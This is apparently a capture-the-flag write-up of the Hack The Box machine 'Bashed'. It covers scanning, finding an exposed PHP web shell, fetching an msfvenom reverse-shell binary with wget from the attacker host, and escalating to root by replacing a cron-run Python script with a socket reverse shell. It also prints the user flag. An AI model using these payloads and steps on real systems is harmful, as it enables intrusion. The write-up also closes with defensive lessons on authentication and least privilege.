This was a pretty quick box, but for some reason, I always find boxes where you hijack an admin script running via root's cron fun to try. There are so many fun tricks to get a shell. A great list of reverse shells is here:
1root@kali:/home/kali/htb/bashed# nmap -sC -sV -p- -O -oN nmap_full 10.10.10.682Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 00:12 EDT3Nmap scan report for 10.10.10.684Host is up (0.055s latency).5Not shown: 65534 closed ports6PORT STATE SERVICE VERSION780/tcp open http Apache httpd 2.4.18 ((Ubuntu))8|_http-server-header: Apache/2.4.18 (Ubuntu)9|_http-title: Arrexel's Development Site10No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).1112Network Distance: 2 hops1310.10.10.681415OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .16Nmap done: 1 IP address (1 host up) scanned in 44.72 seconds
There's a blog describing a php bash console.
It appears we're looking for a file called phpbash.php. This seems a good use case for ffuf.
1root@kali:/home/kali/htb/bashed# ffuf -w /opt/wordlists/common.txt -u http://10.10.10.68/FUZZ/phpbash.php -fs 42 -c -v23 /'___\ /'___\ /'___\ 4 /\ \__/ /\ \__/ __ __ /\ \__/ 5 \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 6 \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 7 \ \_\ \ \_\ \ \____/ \ \_\ 8 \/_/ \/_/ \/___/ \/_/ 910 v1.0.211________________________________________________1213 :: Method : GET14 :: URL : http://10.10.10.68/FUZZ/phpbash.php15 :: Follow redirects : false16 :: Calibration : false17 :: Timeout : 1018 :: Threads : 4019 :: Matcher : Response status: 200,204,301,302,307,401,40320 :: Filter : Response size: 4221________________________________________________2223[Status: 403, Size: 307, Words: 22, Lines: 12]24| URL | http://10.10.10.68/.htaccess/phpbash.php25 * FUZZ: .htaccess2627[Status: 403, Size: 307, Words: 22, Lines: 12]28| URL | http://10.10.10.68/.htpasswd/phpbash.php29 * FUZZ: .htpasswd3031[Status: 403, Size: 302, Words: 22, Lines: 12]32| URL | http://10.10.10.68/.hta/phpbash.php33 * FUZZ: .hta3435[Status: 200, Size: 8151, Words: 3407, Lines: 216]36| URL | http://10.10.10.68/dev/phpbash.php37 * FUZZ: dev
Visiting http://10.10.10.68/dev/phpbash.php, I'm now the www-data user.
1www-data@bashed2:/var/www/html/dev# whoami34www-data5www-data@bashed6:/var/www/html/dev# uname -a78Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux9www-data@bashed10:/var/www/html/dev# cat /etc/*release*1112DISTRIB_ID=Ubuntu13DISTRIB_RELEASE=16.0414DISTRIB_CODENAME=xenial15DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"16NAME="Ubuntu"17VERSION="16.04.2 LTS (Xenial Xerus)"18ID=ubuntu19ID_LIKE=debian20PRETTY_NAME="Ubuntu 16.04.2 LTS"21VERSION_ID="16.04"22HOME_URL="http://www.ubuntu.com/"23SUPPORT_URL="http://help.ubuntu.com/"24BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"25VERSION_CODENAME=xenial26UBUNTU_CODENAME=xenial
1user.txt22c281f318555dbc1b856957c7147bfc1
Viewing all the hidden files in /home/arrexel, it seems this user has used sudo successfully.
1www-data@bashed2:/home/arrexel# ls -alh34total 36K5drwxr-xr-x 4 arrexel arrexel 4.0K Dec 4 2017 .6drwxr-xr-x 4 root root 4.0K Dec 4 2017 ..7-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history8-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout9-rw-r--r-- 1 arrexel arrexel 3.7K Dec 4 2017 .bashrc10drwx------ 2 arrexel arrexel 4.0K Dec 4 2017 .cache11drwxrwxr-x 2 arrexel arrexel 4.0K Dec 4 2017 .nano12-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile13-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful14-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt
The passwd file contains another user called scriptmanager.
1[00;31m[-] Contents of /etc/passwd:[00m2root:x:0:0:root:/root:/bin/bash3daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin4bin:x:2:2:bin:/bin:/usr/sbin/nologin5sys:x:3:3:sys:/dev:/usr/sbin/nologin6sync:x:4:65534:sync:/bin:/bin/sync7games:x:5:60:games:/usr/games:/usr/sbin/nologin8man:x:6:12:man:/var/cache/man:/usr/sbin/nologin9lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin10mail:x:8:8:mail:/var/mail:/usr/sbin/nologin11news:x:9:9:news:/var/spool/news:/usr/sbin/nologin12uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin13proxy:x:13:13:proxy:/bin:/usr/sbin/nologin14www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin15backup:x:34:34:backup:/var/backups:/usr/sbin/nologin16list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin17irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin18gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin19nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin20systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false21systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false22systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false23systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false24syslog:x:104:108::/home/syslog:/bin/false25_apt:x:105:65534::/nonexistent:/bin/false26messagebus:x:106:110::/var/run/dbus:/bin/false27uuidd:x:107:111::/run/uuidd:/bin/false28arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash29scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash
Since this is a php shell, and non-interactive, I want a more comfortable shell work with.
1root@kali:/home/kali/htb/bashed# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f elf -o shell
I stage the shell with python, and use wget to download it to /var/tmp.
1www-data@bashed:/var/tmp# wget http://10.10.14.2/shell2--2020-06-13 22:07:51-- http://10.10.14.2/shell3Connecting to 10.10.14.2:80... connected.4HTTP request sent, awaiting response... 200 OK5Length: 194 [application/octet-stream]6Saving to: 'shell'780K 100% 19.3M=0s9102020-06-13 22:07:51 (19.3 MB/s) - 'shell' saved [194/194]
There is a small problem with this webshell. It doesn't seem to parse + symbols correctly, so I use an alternate chmod command to set the binary as executable. Then, since this webshell seems like it might be running and terminating processes right away, I background the shell execution with an &.
1www-data@bashed:/var/tmp# chmod +x shell23chmod: invalid mode: 'x'4Try 'chmod --help' for more information.5www-data@bashed:/var/tmp# chmod 0755 shell6www-data:/var/tmp# ./shell &
My netcat listener catches the shell, and I use python to make it a pty.
1root@kali:/home/kali# nc -nvlp 4432listening on [any] 443 ...3connect to [10.10.14.2] from (UNKNOWN) [10.10.10.68] 592644python -c 'import pty; pty.spawn("/bin/sh")'5$
There is an interesting file in /scripts.
1$ ls -alh /scripts2ls: cannot access '/scripts/..': Permission denied3ls: cannot access '/scripts/test.py': Permission denied4ls: cannot access '/scripts/test.txt': Permission denied5ls: cannot access '/scripts/.': Permission denied6total 07d????????? ? ? ? ? ? .8d????????? ? ? ? ? ? ..9-????????? ? ? ? ? ? test.py10-????????? ? ? ? ? ? test.txt
I try to cat the files but get a permission denied. Enumerating further, I notice www-data can run commands as scriptmanager.
1$ sudo -l2Matching Defaults entries for www-data on bashed:3 env_reset, mail_badpass,4 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin56User www-data may run the following commands on bashed:7 (scriptmanager : scriptmanager) NOPASSWD: ALL
I can spawn another shell as scriptmanager to try and view the files.
1$ sudo -u scriptmanager /bin/bash2scriptmanager@bashed:/var/tmp$ ls -alh /scripts3total 16K4drwxrwxr-- 2 scriptmanager scriptmanager 4.0K Dec 4 2017 .5drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..6-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py7-rw-r--r-- 1 root root 12 Jun 13 22:25 test.txt
The files are now readable. I noticed the test.txt file is owned by root. It appears root is actually user executing the script.
1scriptmanager@bashed:/var/tmp$ cat /scripts/test.py2f = open("test.txt", "w")3f.write("testing 123!")4f.close5scriptmanager@bashed:/var/tmp$ cat /scripts/test.txt6cat /scripts/test.txt7testing 123!
All I need to do now is modify the script to run code for a reverse shell. I take some python from PayloadsAllTheThings and tweak it a bit.
1import socket,os,pty2s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)3s.connect(("10.10.14.2",80))4os.dup2(s.fileno(),0)5os.dup2(s.fileno(),1)6os.dup2(s.fileno(),2)7pty.spawn("/bin/bash")
I save this to a file on my kali machine, then I serve it up via a smbserver.py and overwrite the test.py file.
1scriptmanager@bashed:/scripts$ wget http://10.10.14.2/shell.py2--2020-06-13 22:57:01-- http://10.10.14.2/shell.py3Connecting to 10.10.14.2:80... connected.4HTTP request sent, awaiting response... 200 OK5Length: 190 [text/plain]6Saving to: ‘shell.py’78shell.py 100%[===================>] 190 --.-KB/s in 0s 9102020-06-13 22:57:01 (20.9 MB/s) - ‘shell.py’ saved [190/190]1112scriptmanager@bashed:/scripts$ mv shell.py test.py
I open a netcat listener, and in a few seconds, the reverse shell connects.
Security through obscurity gets a bad rap, but it isn't enough, especially when you're sharing a web shell publicly.
The web shell gave me a low-privilege shell, and chance to escalate privileges. There should be authentication in front of any type of shell or remote terminal.
Then, an admin script was running as root, but a low-privilege user was allowed to edit the script via sudo privileges.
Ideally, any service accounts such as www-data should have privileges confined to just the files and services they need to access, and sudo permissions should be restricted. Theoretically, a web service user shouldn't even need write permissions to most things unless the web app is saving files.
Always check sudo -l, and keep your eyes open for any lazy admin scripts that might be available to hijack.